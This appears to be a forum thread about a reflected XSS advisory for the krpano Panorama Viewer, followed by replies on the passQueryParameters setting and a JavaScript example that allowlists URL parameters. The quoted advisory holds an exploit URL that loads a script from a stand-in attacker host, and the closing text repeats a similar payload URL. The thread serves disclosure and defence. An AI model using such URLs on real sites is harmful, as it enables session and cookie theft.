
1

Friday, March 19th 2021, 4:40am

XSS in krpano Panorama Viewer

Hi there,

I'm dealing with several large corporate clients who are rather obsessive about security and penetration testing. They are apprehensive about creating tours because of potential threats and vulnerabilities which could be created by adding a tour to their server and website.

I came across this https://seclists.org/fulldisclosure/2020/Oct/7 which details an exploit titled: XSS in krpano Panorama Viewer
Can anyone provide any more information about this and how I might deal with this if it comes up when dealing with Krpano security issues? I need to have an educated response if I am asked about it so I would really appreciate some info.
Thank you,

Details below:

XSS in krpano Panorama Viewer
CVSS Severity: Medium
CVSS Score: 6.1
CVSS Vector:
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
<https://www.first.org/cvss/calculator/3.…S:C/C:L/I:L/A:N>

Description
krpano Panorama Viewer <=1.20.8 is vulnerable to a Reflected Cross-Site
Scripting (XSS) vulnerability caused by improper validation of user
supplied input when loading remote js and XML files in the default
installation (krpano.html).

Impact
A remote attacker could exploit this vulnerability using a specially
crafted URL to execute a script in a victim's Web browser within the
security context of the hosting Web site, once the URL is clicked or
visited. An attacker could use this vulnerability to steal the victim's
cookie-based authentication credentials, force malware execution,
redirect the user, and more.

Steps to Reproduce
Exploit example, from documentation tutorials:
http://VICTIM_SITE/krpano.html?html5=only&preview.type=grid()&plugin[test].url=https://ATTACKER_SITE/labs/krpano/krpano.js&plugin[test].align=center&plugin[test].onclick=dosomething(hello,plugin)&onstart=showlog();

Fix
Block remote loading of JS and XML files. Contact the vendor.

2

Friday, March 19th 2021, 9:34am

First, the "Steps to Reproduce" exploit example is messed up and not correct.

You could inject a JS plugin by URL if passQueryParameters is true (the default is false):
https://krpano.com/docu/html/#passQueryParameters

But this working cross-domain is unlikely...
Even if so, this should be configurable using security / CORS:
https://krpano.com/docu/xml/#security

My guess is this is a bogus alert.



3

Saturday, March 20th 2021, 11:41am

Hi,

This is known and is about the 'passQueryParameters' setting:
https://krpano.com/docu/html/#passQueryParameters

When it is enabled, any kind of code can be passed to the viewer; that is what it is made for.
When it is disabled, nothing can be injected, of course.

But to improve that feature and make it safer, in the next release (version 1.21) the passQueryParameters setting will also allow setting a 'whitelist' of variables that can be passed.

E.g. this way:

Source code:

    embedpano({..., passQueryParameters:"startscene,startlookat"});
Then only the 'startscene' and 'startlookat' parameters can be passed and all others will be ignored.

When XSS is an actual problem in your usage case, make sure that passQueryParameters is set to false.
And if you need to pass parameters via the url, then this would need to be done manually (use JS code to parse the query string and pass the custom parameters via the krpano JS API, I can make an example if required).

Best regards,
Klaus
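The approach Klaus describes in the last post (keep passQueryParameters off, parse the query string yourself, and hand only an allowlisted set of variables to the viewer through the JS API) written out as an added example. This is not krpano's own code and not from the thread: the parameter names startscene and startlookat come from the post above, but the value patterns used to validate them (an XML-name-like scene id, and a list of up to three numbers) are my assumptions, as are the placeholder embed settings (xml, target). The onready callback and krpano.set() are used as documented in the krpano JS API.

```javascript
// Added example: allowlist URL parameters before handing them to krpano,
// so the viewer itself never reads the URL (passQueryParameters:false).

// Names that may be taken from the URL (from the reply above).
const ALLOWED_PARAMETERS = ["startscene", "startlookat"];

// Assumed value shapes: a scene name that looks like an XML name, and
// "h,v,fov"-style numbers for startlookat. Anything else is dropped.
const VALUE_PATTERNS = {
  startscene: /^[A-Za-z_][A-Za-z0-9_\-]*$/,
  startlookat: /^-?\d+(\.\d+)?(,-?\d+(\.\d+)?){0,2}$/,
};

// Parse a query string ("?a=b&c=d") and return the parameters that pass
// both the name allowlist and the per-name value check, plus the names
// that were rejected (useful for logging attempts like plugin[x].url=...).
function filterQueryParameters(search, allowed = ALLOWED_PARAMETERS) {
  const params = new URLSearchParams(search);
  const accepted = {};
  const rejected = [];
  for (const [name, value] of params) {
    const hasPattern = Object.prototype.hasOwnProperty.call(VALUE_PATTERNS, name);
    if (!allowed.includes(name) || !hasPattern || !VALUE_PATTERNS[name].test(value)) {
      rejected.push(name);
      continue;
    }
    accepted[name] = value;
  }
  return { accepted, rejected };
}

// Embed the viewer with passQueryParameters disabled and push the accepted
// values in via krpano.set() once the viewer is ready. `embed` is the
// embedpano() function (injected here so the logic is testable without a
// browser); xml/target are placeholder settings.
function embedWithFilteredParameters(embed, search) {
  const result = filterQueryParameters(search);
  embed({
    xml: "tour.xml",
    target: "pano",
    html5: "only",
    passQueryParameters: false, // viewer never parses the URL itself
    onready: function (krpano) {
      for (const name of Object.keys(result.accepted)) {
        krpano.set(name, result.accepted[name]);
      }
    },
  });
  return result;
}

// In a real page: run against the current URL if embedpano is loaded.
if (typeof window !== "undefined" && typeof window.embedpano === "function") {
  embedWithFilteredParameters(window.embedpano, window.location.search);
}
```

With this in place a URL such as `?plugin[test].url=https://attacker.example/x.js&onstart=showlog()` reaches neither the viewer nor the XML: both names fall outside the allowlist and end up in `rejected`, while `?startscene=scene_lobby` is forwarded unchanged. Validating the value, not only the name, matters because an allowlisted variable is still assigned as a krpano string; keeping it to a fixed pattern avoids smuggling action code through it.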